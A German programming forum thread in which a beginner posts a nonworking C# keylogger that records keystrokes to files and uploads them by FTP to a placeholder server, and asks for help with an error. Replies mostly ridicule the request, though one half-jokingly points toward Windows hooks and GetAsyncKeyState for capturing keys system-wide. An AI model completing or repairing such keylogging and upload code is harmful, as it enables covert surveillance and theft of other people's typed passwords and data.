Problem mit FTP-Dateiupload
-
Hey! Ich habe angefangen mich mit C# Forms Anwendungen zu beschäftigen.
Nun möchte ich, dass per FTP eine Datei hochgeladen wird.
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.IO; using System.Net; using System.Windows.Forms; using Utilities; namespace Keylogger { public partial class Form1 : Form { public Form1() { InitializeComponent(); } int timertime = 0; string username = "USERNAME"; string password = "KENNWORT"; string URLpath = "FTP-ADRESSE"; int zaeler = 1; string FilePath; string fileName; void gkh_KeyDown(object sender, KeyEventArgs e) { StreamWriter SW = new StreamWriter(@"C:\" + zaeler + ".txt", true); SW.Write(e.KeyCode); SW.Close(); FilePath = @"C:\"; fileName = zaeler + "logging.txt"; } private void timer1_Tick(object sender, EventArgs e) { timertime = timertime + 1; if (timertime < 300000) { WebClient Client = new WebClient(); Client.Credentials = new System.Net.NetworkCredential(username, password); Client.BaseAddress = URLpath; Client.UploadFile(WebRequestMethods.Ftp.UploadFile, FilePath, zaeler + "logging.txt"); timertime = 0; zaeler++; } } } }
Nun bekomme ich beim debuggen eine Fehlermeldung:
http://nnrw.cwsurf.de/bild.php/65,errorF1D08.png
[/img]Was läuft hier falsch?
Habe noch nicht soviel Erfahrungen in C#, arbeite mich derzeit durch Tutorial-Videos durch.
Danke im Voraus
MfG Cedric
-
Du meinst das wir dir helfen bei einem Programm was Keylogger heisst und dauerhaft die Daten mitspeichert(mal abgesehen davon wie schlecht du das programmiert hast)?
So einen Guten Troll hatten wir lange nich mehr.
-
Ist doch niedlich, dass die Form den Focus haben muss, damit der "Keylogger" auch funktioniert
-
µ schrieb:
Ist doch niedlich, dass die Form den Focus haben muss, damit der "Keylogger" auch funktioniert
Lol, ja das hab ich mir auch gerade gedacht. Ach herrlich...
-
µ schrieb:
Ich kann net mehr.
Aber vielleicht hat der Thread Ersteller ja gar nichts böses vor. ^^
@ Thread Ersteller
cedric30003 schrieb:
Habe noch nicht soviel Erfahrungen in C#, arbeite mich derzeit durch Tutorial-Videos durch.
- Kauf dir lieber ein GUTES Buch
- Schau dir mal die Windows Hooks an
- Oder GetAsyncKeyState falls du es mit den Hooks nicht hinbekommst ^^Aber da du ja sich nichts böses machen willst was die ganze Zeit irgendwelche Tasteneingaben mitloggt wäre GetAsyncKeyState denke ich mal ausreichend.
Btw. beschäftige dich mal mit Sniffern und Verschlüsselungen, dann kannst du mal sehen wie schnell dein FTP Account weg sein kann.
Ach ja, und beschäftige dich mal mit Reverse Engineering.